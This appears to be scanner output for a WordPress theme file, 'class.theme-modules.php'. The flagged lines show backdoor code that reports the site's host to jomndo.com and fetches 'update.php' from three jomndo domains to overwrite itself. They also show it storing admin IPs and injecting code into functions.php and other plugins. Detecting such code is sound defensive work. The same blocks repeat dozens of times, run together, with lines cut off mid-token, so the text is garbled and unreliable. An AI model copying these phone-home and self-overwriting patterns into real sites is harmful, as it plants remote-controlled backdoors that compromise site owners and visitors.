'');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: 